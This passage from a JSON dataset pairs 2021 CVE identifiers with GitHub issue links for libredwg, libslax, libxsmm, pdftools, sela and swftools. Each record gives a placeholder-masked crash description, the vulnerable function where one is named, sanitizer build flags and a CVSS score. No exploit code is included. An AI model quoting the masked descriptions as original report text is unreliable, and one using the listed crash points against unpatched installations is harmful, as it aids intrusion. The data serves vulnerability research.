  69922. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master bacd NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./SEGV bit_read_BB bits NUMBERTAG o /dev/null Output APITAG APITAG output ERRORTAG POC FILETAG",
  69923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69924. "severity": "MEDIUM",
  69925. "baseScore": 6.5,
  69926. "impactScore": 3.6,
  69927. "exploitabilityScore": 2.8
  69928. },
  69929. {
  69930. "CVE_ID": "CVE-2021-39522",
  69931. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/255",
  69932. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/255",
  69933. "Repo_new": "libredwg/libredwg",
  69934. "Issue_Created_At": "2020-07-31T12:13:06Z",
  69935. "description": "A heap buffer overflow in bit_wcs2len at APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./heap buffer overflow bit_wcs2len bits NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
  69936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69937. "severity": "HIGH",
  69938. "baseScore": 8.8,
  69939. "impactScore": 5.9,
  69940. "exploitabilityScore": 2.8
  69941. },
  69942. {
  69943. "CVE_ID": "CVE-2021-39523",
  69944. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/251",
  69945. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/251",
  69946. "Repo_new": "libredwg/libredwg",
  69947. "Issue_Created_At": "2020-07-31T08:53:01Z",
  69948. "description": "A Segmentation fault error in check_POLYLINE_handles at APITAG System info: Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Command line PATHTAG b m ./SEGV check_POLYLINE_handles decode NUMBERTAG o /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69949. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69950. "severity": "MEDIUM",
  69951. "baseScore": 6.5,
  69952. "impactScore": 3.6,
  69953. "exploitabilityScore": 2.8
  69954. },
  69955. {
  69956. "CVE_ID": "CVE-2021-39525",
  69957. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/261",
  69958. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/261",
  69959. "Repo_new": "libredwg/libredwg",
  69960. "Issue_Created_At": "2020-08-02T04:51:37Z",
  69961. "description": "A heap overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master NUMBERTAG ef NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./SEGV check_POLYLINE_handles decode NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
  69962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69963. "severity": "HIGH",
  69964. "baseScore": 8.8,
  69965. "impactScore": 5.9,
  69966. "exploitabilityScore": 2.8
  69967. },
  69968. {
  69969. "CVE_ID": "CVE-2021-39527",
  69970. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/252",
  69971. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/252",
  69972. "Repo_new": "libredwg/libredwg",
  69973. "Issue_Created_At": "2020-07-31T08:58:03Z",
  69974. "description": "A heap buffer overflow in appinfo_private at APITAG System info: Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Command line PATHTAG b m ./heap buffer overflow appinfo_private decode NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
  69975. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69976. "severity": "HIGH",
  69977. "baseScore": 8.8,
  69978. "impactScore": 5.9,
  69979. "exploitabilityScore": 2.8
  69980. },
  69981. {
  69982. "CVE_ID": "CVE-2021-39528",
  69983. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/256",
  69984. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/256",
  69985. "Repo_new": "libredwg/libredwg",
  69986. "Issue_Created_At": "2020-08-01T12:56:26Z",
  69987. "description": "A double free in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwgbmp (latest master NUMBERTAG b NUMBERTAG ed URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG ./double free dwg_free_MATERIAL_private APITAG NUMBERTAG FILETAG APITAG output ERRORTAG POC FILETAG",
  69988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69989. "severity": "HIGH",
  69990. "baseScore": 8.8,
  69991. "impactScore": 5.9,
  69992. "exploitabilityScore": 2.8
  69993. },
  69994. {
  69995. "CVE_ID": "CVE-2021-39530",
  69996. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/258",
  69997. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/258",
  69998. "Repo_new": "libredwg/libredwg",
  69999. "Issue_Created_At": "2020-08-02T02:25:59Z",
  70000. "description": "Incomplete fix for issues NUMBERTAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwgbmp (latest master NUMBERTAG ef NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG ./heap overflow bit_wcs2nlen bit NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70002. "severity": "HIGH",
  70003. "baseScore": 8.8,
  70004. "impactScore": 5.9,
  70005. "exploitabilityScore": 2.8
  70006. },
  70007. {
  70008. "CVE_ID": "CVE-2021-39531",
  70009. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/53",
  70010. "Issue_Url_new": "https://github.com/juniper/libslax/issues/53",
  70011. "Repo_new": "juniper/libslax",
  70012. "Issue_Created_At": "2020-08-03T16:29:31Z",
  70013. "description": "A dynamic stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70015. "severity": "HIGH",
  70016. "baseScore": 8.8,
  70017. "impactScore": 5.9,
  70018. "exploitabilityScore": 2.8
  70019. },
  70020. {
  70021. "CVE_ID": "CVE-2021-39532",
  70022. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/50",
  70023. "Issue_Url_new": "https://github.com/juniper/libslax/issues/50",
  70024. "Repo_new": "juniper/libslax",
  70025. "Issue_Created_At": "2020-08-02T14:01:43Z",
  70026. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70028. "severity": "MEDIUM",
  70029. "baseScore": 6.5,
  70030. "impactScore": 3.6,
  70031. "exploitabilityScore": 2.8
  70032. },
  70033. {
  70034. "CVE_ID": "CVE-2021-39533",
  70035. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/51",
  70036. "Issue_Url_new": "https://github.com/juniper/libslax/issues/51",
  70037. "Repo_new": "juniper/libslax",
  70038. "Issue_Created_At": "2020-08-02T14:04:56Z",
  70039. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70040. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70041. "severity": "HIGH",
  70042. "baseScore": 8.8,
  70043. "impactScore": 5.9,
  70044. "exploitabilityScore": 2.8
  70045. },
  70046. {
  70047. "CVE_ID": "CVE-2021-39534",
  70048. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/52",
  70049. "Issue_Url_new": "https://github.com/juniper/libslax/issues/52",
  70050. "Repo_new": "juniper/libslax",
  70051. "Issue_Created_At": "2020-08-02T14:07:30Z",
  70052. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70054. "severity": "HIGH",
  70055. "baseScore": 8.8,
  70056. "impactScore": 5.9,
  70057. "exploitabilityScore": 2.8
  70058. },
  70059. {
  70060. "CVE_ID": "CVE-2021-39535",
  70061. "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/398",
  70062. "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/398",
  70063. "Repo_new": "libxsmm/libxsmm",
  70064. "Issue_Created_At": "2020-08-02T12:35:38Z",
  70065. "description": "A Segmentation fault in libxsmm_gemm_generator. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), libxsmm_gemm_generator (latest master ea NUMBERTAG d0 URLTAG Command line This input is the project testcases APITAG PATHTAG sparse foo.c foo NUMBERTAG hsw nopf DP ./SEGV gemm_generator Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70067. "severity": "MEDIUM",
  70068. "baseScore": 6.5,
  70069. "impactScore": 3.6,
  70070. "exploitabilityScore": 2.8
  70071. },
  70072. {
  70073. "CVE_ID": "CVE-2021-39536",
  70074. "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/402",
  70075. "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/402",
  70076. "Repo_new": "libxsmm/libxsmm",
  70077. "Issue_Created_At": "2020-08-04T03:30:27Z",
  70078. "description": "A heap overflow causes corrupted heap size . System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), libxsmm_gemm_generator (latest master ea NUMBERTAG d0 URLTAG Command line PATHTAG sparse foo.c foo NUMBERTAG hsw nopf DP APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  70079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70080. "severity": "HIGH",
  70081. "baseScore": 8.8,
  70082. "impactScore": 5.9,
  70083. "exploitabilityScore": 2.8
  70084. },
  70085. {
  70086. "CVE_ID": "CVE-2021-39538",
  70087. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/4",
  70088. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/4",
  70089. "Repo_new": "leonhad/pdftools",
  70090. "Issue_Created_At": "2020-08-06T03:30:47Z",
  70091. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70092. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70093. "severity": "MEDIUM",
  70094. "baseScore": 5.5,
  70095. "impactScore": 3.6,
  70096. "exploitabilityScore": 1.8
  70097. },
  70098. {
  70099. "CVE_ID": "CVE-2021-39539",
  70100. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/6",
  70101. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/6",
  70102. "Repo_new": "leonhad/pdftools",
  70103. "Issue_Created_At": "2020-08-06T04:47:08Z",
  70104. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70105. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70106. "severity": "MEDIUM",
  70107. "baseScore": 5.5,
  70108. "impactScore": 3.6,
  70109. "exploitabilityScore": 1.8
  70110. },
  70111. {
  70112. "CVE_ID": "CVE-2021-39540",
  70113. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/2",
  70114. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/2",
  70115. "Repo_new": "leonhad/pdftools",
  70116. "Issue_Created_At": "2020-08-06T03:21:53Z",
  70117. "description": "A stack overflow in APITAG causes Segmentation fault. System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70118. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70119. "severity": "HIGH",
  70120. "baseScore": 7.8,
  70121. "impactScore": 5.9,
  70122. "exploitabilityScore": 1.8
  70123. },
  70124. {
  70125. "CVE_ID": "CVE-2021-39541",
  70126. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/3",
  70127. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/3",
  70128. "Repo_new": "leonhad/pdftools",
  70129. "Issue_Created_At": "2020-08-06T03:28:10Z",
  70130. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70131. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70132. "severity": "MEDIUM",
  70133. "baseScore": 5.5,
  70134. "impactScore": 3.6,
  70135. "exploitabilityScore": 1.8
  70136. },
  70137. {
  70138. "CVE_ID": "CVE-2021-39542",
  70139. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/5",
  70140. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/5",
  70141. "Repo_new": "leonhad/pdftools",
  70142. "Issue_Created_At": "2020-08-06T03:35:01Z",
  70143. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70144. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70145. "severity": "MEDIUM",
  70146. "baseScore": 5.5,
  70147. "impactScore": 3.6,
  70148. "exploitabilityScore": 1.8
  70149. },
  70150. {
  70151. "CVE_ID": "CVE-2021-39543",
  70152. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/1",
  70153. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/1",
  70154. "Repo_new": "leonhad/pdftools",
  70155. "Issue_Created_At": "2020-08-05T14:10:06Z",
  70156. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70157. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70158. "severity": "MEDIUM",
  70159. "baseScore": 5.5,
  70160. "impactScore": 3.6,
  70161. "exploitabilityScore": 1.8
  70162. },
  70163. {
  70164. "CVE_ID": "CVE-2021-39544",
  70165. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/25",
  70166. "Issue_Url_new": "https://github.com/saharatul/sela/issues/25",
  70167. "Repo_new": "saharatul/sela",
  70168. "Issue_Created_At": "2020-08-14T04:52:18Z",
  70169. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70170. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70171. "severity": "HIGH",
  70172. "baseScore": 7.8,
  70173. "impactScore": 5.9,
  70174. "exploitabilityScore": 1.8
  70175. },
  70176. {
  70177. "CVE_ID": "CVE-2021-39545",
  70178. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/31",
  70179. "Issue_Url_new": "https://github.com/saharatul/sela/issues/31",
  70180. "Repo_new": "saharatul/sela",
  70181. "Issue_Created_At": "2020-08-14T05:04:52Z",
  70182. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70183. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70184. "severity": "MEDIUM",
  70185. "baseScore": 5.5,
  70186. "impactScore": 3.6,
  70187. "exploitabilityScore": 1.8
  70188. },
  70189. {
  70190. "CVE_ID": "CVE-2021-39546",
  70191. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/29",
  70192. "Issue_Url_new": "https://github.com/saharatul/sela/issues/29",
  70193. "Repo_new": "saharatul/sela",
  70194. "Issue_Created_At": "2020-08-14T05:00:32Z",
  70195. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70196. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70197. "severity": "HIGH",
  70198. "baseScore": 7.8,
  70199. "impactScore": 5.9,
  70200. "exploitabilityScore": 1.8
  70201. },
  70202. {
  70203. "CVE_ID": "CVE-2021-39547",
  70204. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/32",
  70205. "Issue_Url_new": "https://github.com/saharatul/sela/issues/32",
  70206. "Repo_new": "saharatul/sela",
  70207. "Issue_Created_At": "2020-08-14T05:06:36Z",
  70208. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70209. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70210. "severity": "MEDIUM",
  70211. "baseScore": 5.5,
  70212. "impactScore": 3.6,
  70213. "exploitabilityScore": 1.8
  70214. },
  70215. {
  70216. "CVE_ID": "CVE-2021-39548",
  70217. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/28",
  70218. "Issue_Url_new": "https://github.com/saharatul/sela/issues/28",
  70219. "Repo_new": "saharatul/sela",
  70220. "Issue_Created_At": "2020-08-14T04:58:45Z",
  70221. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70222. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70223. "severity": "MEDIUM",
  70224. "baseScore": 5.5,
  70225. "impactScore": 3.6,
  70226. "exploitabilityScore": 1.8
  70227. },
  70228. {
  70229. "CVE_ID": "CVE-2021-39549",
  70230. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/27",
  70231. "Issue_Url_new": "https://github.com/saharatul/sela/issues/27",
  70232. "Repo_new": "saharatul/sela",
  70233. "Issue_Created_At": "2020-08-14T04:56:57Z",
  70234. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70235. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70236. "severity": "MEDIUM",
  70237. "baseScore": 5.5,
  70238. "impactScore": 3.6,
  70239. "exploitabilityScore": 1.8
  70240. },
  70241. {
  70242. "CVE_ID": "CVE-2021-39550",
  70243. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/30",
  70244. "Issue_Url_new": "https://github.com/saharatul/sela/issues/30",
  70245. "Repo_new": "saharatul/sela",
  70246. "Issue_Created_At": "2020-08-14T05:02:24Z",
  70247. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70248. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70249. "severity": "HIGH",
  70250. "baseScore": 7.8,
  70251. "impactScore": 5.9,
  70252. "exploitabilityScore": 1.8
  70253. },
  70254. {
  70255. "CVE_ID": "CVE-2021-39551",
  70256. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/26",
  70257. "Issue_Url_new": "https://github.com/saharatul/sela/issues/26",
  70258. "Repo_new": "saharatul/sela",
  70259. "Issue_Created_At": "2020-08-14T04:54:33Z",
  70260. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70261. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70262. "severity": "HIGH",
  70263. "baseScore": 7.8,
  70264. "impactScore": 5.9,
  70265. "exploitabilityScore": 1.8
  70266. },
  70267. {
  70268. "CVE_ID": "CVE-2021-39552",
  70269. "Issue_Url_old": "https://github.com/sahaRatul/sela/issues/23",
  70270. "Issue_Url_new": "https://github.com/saharatul/sela/issues/23",
  70271. "Repo_new": "saharatul/sela",
  70272. "Issue_Created_At": "2020-08-14T02:49:47Z",
  70273. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG sela (latest master ca NUMBERTAG cb URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG d APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  70274. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70275. "severity": "HIGH",
  70276. "baseScore": 7.8,
  70277. "impactScore": 5.9,
  70278. "exploitabilityScore": 1.8
  70279. },
  70280. {
  70281. "CVE_ID": "CVE-2021-39553",
  70282. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/103",
  70283. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/103",
  70284. "Repo_new": "matthiaskramm/swftools",
  70285. "Issue_Created_At": "2020-08-01T06:55:27Z",
  70286. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow grealloc gmem NUMBERTAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  70287. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70288. "severity": "MEDIUM",
  70289. "baseScore": 5.5,
  70290. "impactScore": 3.6,
  70291. "exploitabilityScore": 1.8
  70292. },
  70293. {
  70294. "CVE_ID": "CVE-2021-39554",
  70295. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/100",
  70296. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/100",
  70297. "Repo_new": "matthiaskramm/swftools",
  70298. "Issue_Created_At": "2020-08-01T02:16:31Z",
  70299. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./stack overflow Lexer Lexer NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70300. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70301. "severity": "MEDIUM",
  70302. "baseScore": 5.5,
  70303. "impactScore": 3.6,
  70304. "exploitabilityScore": 1.8
  70305. },
  70306. {
  70307. "CVE_ID": "CVE-2021-39555",
  70308. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/99",
  70309. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/99",
  70310. "Repo_new": "matthiaskramm/swftools",
  70311. "Issue_Created_At": "2020-08-01T02:10:19Z",
  70312. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pdf2swf (latest master fad6c2 URLTAG Command line ./pdf2swf qq z o /dev/null ./SEGV type3D0 APITAG NUMBERTAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  70313. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70314. "severity": "MEDIUM",
  70315. "baseScore": 5.5,
  70316. "impactScore": 3.6,
  70317. "exploitabilityScore": 1.8
  70318. },
  70319. {
  70320. "CVE_ID": "CVE-2021-39556",
  70321. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/105",
  70322. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/105",
  70323. "Repo_new": "matthiaskramm/swftools",
  70324. "Issue_Created_At": "2020-08-01T07:01:24Z",
